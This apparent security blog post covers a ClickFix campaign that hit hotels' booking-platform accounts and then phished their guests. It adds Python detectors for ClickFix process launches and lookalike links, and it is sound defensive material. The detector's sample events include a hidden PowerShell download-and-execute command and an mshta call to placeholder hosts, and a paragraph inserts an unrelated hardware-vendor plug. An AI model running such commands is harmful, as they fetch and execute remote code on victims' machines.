Hotel Booking Scam Hits Guests With Double Attack


According to Dark Reading, researchers at Sekoia.io uncovered a broad ClickFix attack campaign targeting hotels since at least April 2025 that remained active through October. The attacks use compromised hotel email accounts or WhatsApp messages containing legitimate customer reservation details to appear credible. Threat actors steal professional credentials for booking platforms like Booking.com and Expedia, then either sell them on cybercrime forums or use them directly to contact hotel customers. The campaign involves hundreds of malicious domains and delivers infostealing malware as well as the PureRAT remote access trojan. Attackers then conduct secondary attacks against customers by sending fake security alerts about banking details, leading to credential theft through phishing pages that perfectly mimic Booking.com.


How ClickFix works

Here’s the thing about ClickFix – it’s basically a clever social engineering trick that makes people install malware thinking they’re fixing something. The attack starts with a compromised email that looks like it’s from Booking.com, often about last-minute reservations or guest matters. When hotel staff click the link, they get redirected through a fake reCAPTCHA challenge that eventually prompts them to copy and run a malicious PowerShell command. And that’s where everything goes wrong.

The command deploys infostealers that grab everything from system information to booking platform credentials. But it doesn’t stop there – the attackers then download PureRAT, which gives them remote control over the infected system. We’re talking full keyboard and mouse control, webcam access, file exfiltration – the whole nine yards. What makes this particularly nasty is that the malware reports back to command-and-control servers at every step, so the attackers know exactly when they’ve successfully compromised a target.
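The defender's view of the step above is the moment a user pastes a "fix" into an interpreter. The following is an added example, not code from the article or from Sekoia.io: it scores constructed Sysmon-style process-creation records for the ClickFix pattern (a shell or script interpreter launched interactively from explorer.exe, combined with hidden-window, encoded or download-and-execute arguments). Field names and sample events are assumptions for illustration.

```python
import re

# Constructed sample events modelled on Sysmon-style process-creation records
# (fields chosen for illustration; not indicators from the Sekoia report).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm http://example.invalid/x)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe reservation.txt"},
    {"ParentImage": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": r"pwsh -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://example.invalid/verify"},
]

# Interpreters a victim is typically told to paste into, and parents that
# indicate an interactive (user-driven) launch rather than a scheduled task.
PASTE_INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")
INTERACTIVE_PARENTS = ("explorer.exe",)
SUSPICIOUS_ARGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
    r"|\biex\b|invoke-expression|invoke-webrequest|\birm\b|downloadstring"
    r"|https?://)", re.IGNORECASE)

def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    reasons = []
    if image in PASTE_INTERPRETERS and parent in INTERACTIVE_PARENTS:
        reasons.append(f"{image} launched interactively from {parent}")
    for m in SUSPICIOUS_ARGS.finditer(ev["CommandLine"]):
        reasons.append(f"suspicious argument: {m.group(0)}")
    return len(reasons), reasons

def flag_clickfix(events, threshold=2):
    """Return (command line, reasons) for events at or above the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["CommandLine"], reasons))
    return hits

if __name__ == "__main__":
    for cmd, why in flag_clickfix(SAMPLE_EVENTS):
        print(cmd, "->", "; ".join(why))
```

The threshold keeps a plain interactive PowerShell launch from alerting on its own; it takes the interactive parent plus at least one hidden, encoded or download-and-run argument to fire.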

Double trouble for customers

Now here’s where it gets really clever. The attackers don’t just stop at compromising the hotels. They use the stolen reservation details to contact customers directly through WhatsApp or email. Imagine getting a message that looks completely legitimate because it includes your actual reservation number, check-in dates, everything. The message claims there’s a security issue with your banking details and urges you to confirm your information “to protect against cancellations.”

So customers click through to what looks exactly like Booking.com’s website, but it’s actually harvesting their banking credentials. It’s a classic one-two punch – compromise the business first, then use that access to target their customers. And because the attackers have real reservation data, the phishing attempts are incredibly convincing. Who’s going to question a security alert that includes all their correct booking details?
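One concrete form of the "does this link really go to Booking.com?" check is to look at the registrable domain rather than the brand name in the hostname. This is an added example, not code from the article: it extracts the URLs from a constructed message in the style described above and labels each as legitimate, a brand lookalike, or unknown. The sample message, the legitimate-domain set and the simplified two-label domain rule are assumptions for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample message in the style the article describes (not a real
# campaign message). The reservation number and link are invented.
SAMPLE_MESSAGE = """Dear guest, reservation 123456789 (check-in 12 Nov) requires
verification of your banking details to protect against cancellations:
https://booking.com-secure-verify.example/confirm?res=123456789
Official help centre: https://www.booking.com/help"""

# Assumed allowlist of the platforms named in the article.
LEGIT_DOMAINS = {"booking.com", "expedia.com"}
BRAND_TOKENS = ("booking", "expedia")
URGENCY_PHRASES = ("banking details", "protect against cancellations",
                   "confirm your information", "security issue")
URL_RE = re.compile(r"https?://[^\s<>\"']+")

def registrable_domain(host):
    """Simplified: keep the last two labels. A production check should use
    the public suffix list so co.uk-style suffixes are handled correctly."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()

def classify_url(url):
    """legitimate: registrable domain is allowlisted.
    lookalike: not allowlisted but the hostname carries the brand name."""
    host = urlparse(url).hostname or ""
    if registrable_domain(host) in LEGIT_DOMAINS:
        return "legitimate"
    if any(tok in host for tok in BRAND_TOKENS):
        return "lookalike"
    return "unknown"

def analyse_message(text):
    """Return per-URL verdicts and a message-level flag that is set when a
    lookalike link is paired with the urgency language the article quotes."""
    verdicts = [(u, classify_url(u)) for u in URL_RE.findall(text)]
    lowered = text.lower()
    urgent = any(p in lowered for p in URGENCY_PHRASES)
    suspicious = urgent and any(v == "lookalike" for _, v in verdicts)
    return {"urls": verdicts, "urgent": urgent, "suspicious": suspicious}

if __name__ == "__main__":
    print(analyse_message(SAMPLE_MESSAGE))
```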

Why this matters

This campaign shows how threat actors are getting smarter about supply chain attacks. They’re not just going after individual targets anymore – they’re compromising businesses to get access to their customer bases. The hospitality sector is particularly vulnerable because hotels handle massive amounts of personal and financial data, and they’re constantly communicating with customers about reservations.

What’s concerning is how long this campaign has been running – from April to at least October, with hundreds of malicious domains staying active for months. That suggests it’s both resilient and profitable for the attackers. And when you look at the tools they’re using, like PureRAT, which is available as malware-as-a-service, it’s clear this isn’t some sophisticated nation-state operation. These are commodity tools being used in clever ways.

For businesses relying on industrial computing systems, whether in manufacturing facilities or hotel operations, having secure hardware becomes critical. Companies like IndustrialMonitorDirect.com provide ruggedized panel PCs designed for these environments, but the human element remains the weakest link. No matter how secure your hardware is, if staff can be tricked into running malicious commands, you’ve got a problem.

Staying protected

So what can hotels and customers do? The researchers included indicators of compromise in their full report, which helps security teams detect these attacks. But fundamentally, it comes down to being suspicious of unsolicited messages, even when they appear to come from legitimate services.

Hotels should implement strict email security policies and train staff to recognize these types of attacks. Customers should remember that legitimate companies rarely ask you to confirm banking details through unsolicited messages. And if you’re ever unsure, always contact the company directly through their official website or phone number – don’t use the contact information in the suspicious message.

This isn’t going away anytime soon. As research shows, social engineering remains the preferred method for initial access because it works. The attackers will keep refining their techniques, and we need to keep raising our defenses accordingly.
